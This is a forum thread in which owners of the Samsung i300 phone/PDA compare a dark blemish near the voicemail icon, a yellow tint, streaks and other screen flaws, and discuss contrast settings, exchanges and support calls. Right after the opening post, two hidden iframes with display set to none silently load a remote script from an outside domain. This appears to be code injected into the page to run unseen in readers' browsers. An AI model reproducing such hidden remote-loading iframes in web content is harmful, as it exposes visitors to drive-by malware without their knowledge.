+ Reply to Thread
Page 1 of 2 1 2 LastLast

Screen Blemish

I am on my second phone now. With both phones I have had a dark blemish on the screen where the voicemail icon pops up. It is a dark blue blemish the size of a half a thumb print. It gets worse with time.

Has anyone else had this problem?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have that also, but does not sound as big as yours. Mine comes down to the middle of the v/m icon. You say you had your replaced, do you have the equipment replacement plan?
    Carl

I do have the equipment replacement plan. I thought it was a problem with the phone so I got another one. Unfortunately the problem did not go away with the second phone.

Administrator

Arrow

does the contrast button make any difference? i have mine set on the "t" in contrast.. i dont see this blemish..however, i have not paid that part of the screen any attention when i get a VM icon... but ill have a look at it when i get my next VM...

i've got that "blemish." Looks like there is a bit of pressure on the screen at that point. I wouldn't call it a blemish on mine. Havee often noticed it but too small to replace.

I'll hold on to my lifelines.

Unhappy Blemish

I also have the small blue blemish at the top of the screen by the VM icon. Mine seems to be there all the time. I guessed I never noticed it before this thread was posted. I adjusted the contrast and that seemed to get rid of it.

The blemish on my phone is about the size of a small fingerprint.

Laurie

Unhappy Yes I have the Blemish Too!

Hello All,

New to this forum and loving my new I300 phone/PDA!! I just got my phone/PDA on Nov 30th and I also have the same blemish at the very top and center of the screen, where the voice mail icon shows up. You can also say its just below the Sp in the Sprint Logo. I went back to Best Buy to exchange my phone and found that the screens on three phones I looked at had a yellow tint to them when compared to my current phone. They did not have the blemish, but the yellow tint was much more annoying. I adjusted the contrast on all four phones (including mine) to be the same and they still all looked slightly "yellower" compared to my phone. So I kept my phone.

I called Samsung and got Technical Support Level 2, which happens to reside in Dallas where I live, and the Guy there said he can see the same defect on his I300 phone. This guy said it is a "normal" defect on the phone because it is a "low" power consumption color PDA screen. Samsung had to go with a lower power color screen because of the power consumption of having both a mobile phone and a PDA running off the same power source. I guess its lower power screen compared to a PDA (without mobile phone) color screen. So that is what I know. I am going to keep an eye on my blemish. IF it keeps growing I will definitely make Samsung fix it or replace my phone.

Judging by all the folks so far that noticed this blemish it looks like we possibly have a "recall" level defect here. This is a very expensive gadget and it would be nice if it was almost perfect(its man made so it can't be perfect). Anyway I am open to responses or suggestions.
    EMR

Speaking of blemishes...

Does anybody else of a "wavey" or discoloration along the right hand side of the screen, along the edge. It's barely noticable, so I don't pay it any attention. Just curious if this is on anybody else's.

I am wavey, too.

I agree with all of you that the screen is certainly not flawless. I for instance have vertical lines running past where the keys end on my display (the blue continues). I also have my contrast turned up way high. If I look at the screen from down here I see nothing, including the blemish. If I look from up here I see it all. As was stated before, the screen is passive matrix, so unfortunately, that is a characteristic of this particular model that will just have to be accepted.

What I find interesting is that everyone of you seems to have different problems with thier screens. Some screens have the blemish, others have a yellow tint, some have streaks, and the contrast level is different for every one.

For $499 , the quality and consistency from Samsung on this unit is dissappointing!!

Good concept, bad design.

Administrator

Arrow

remember, these are first run units... the first units on most electronics wil have bugs in them...

i knew that coming out that this phone may have some issues.. the kyo 6035 did...

the next run of phones will no doubt be better!!

Cut Samsung some slack. We have paid a high price, but recieved the latest in technology. We learned that the screen is not the greatest, but at this point in the development of this technology, it is acceptable, considering all of the other advances we get. If you want an integrated phone/PDA with an excellent color screen for $99, you will have plenty of choices in 2004.

Dark spot at the top of display

My i300 has a small dark spot shaped like a half circle at the very top of the display. It reminds me of what happened when I put my speakers too close to the tv in college.

This is not a major problem at all, but I was just wondering if anyone else has experienced the same problem.

problem or not, my conscience in clear when I go for the Best Buy "upgrade". I can't wait for the i330

-Clay

I have the same small semi-circle. It must be the speaker phone .....I will have the same joy when I return mine to CC for the new model.
    Da Guru

Run a search on "blemish" guys. You should find some pertinent dialogue.

Unhappy Me Too

Hi Everyone..I also have the blemish at the top of the screen right under the the Sprint logo. It's a purplish color. Looks like a half moon like on your nail.

A

Unhappy Screen Blemish

I am starting to see the bottom part of my I300 turn white. It is noticeable when the phone dialer is up. It seems the only thing that makes it go away is adjusting the color contrast to max or going to a screen that has a white background. basically what i am trying to say is that *, 0, #, are much whiter than the rest of the numbers which are a sky blue. should I be worrying and is there anything i can do to correct it? Please help asap.

Thank You

Re: Screen Blemish

Originally posted by njvikesfan
    I am starting to see the bottom part of my I300 turn white. It is noticeable when the phone dialer is up. It seems the only thing that makes it go away is adjusting the color contrast to max or going to a screen that has a white background. basically what i am trying to say is that *, 0, #, are much whiter than the rest of the numbers which are a sky blue. should I be worrying and is there anything i can do to correct it? Please help asap.

Thank You
    I don't see this in my phone yet, how long have you had your phone.
    You should see the screen even in color. What about the function buttons at the very end, are they different in color too.???????

My Blemish is under the Spritn logo as well....about the width of a nickel on end...didn't really notice it until reading tis thread...thanks for pointing it out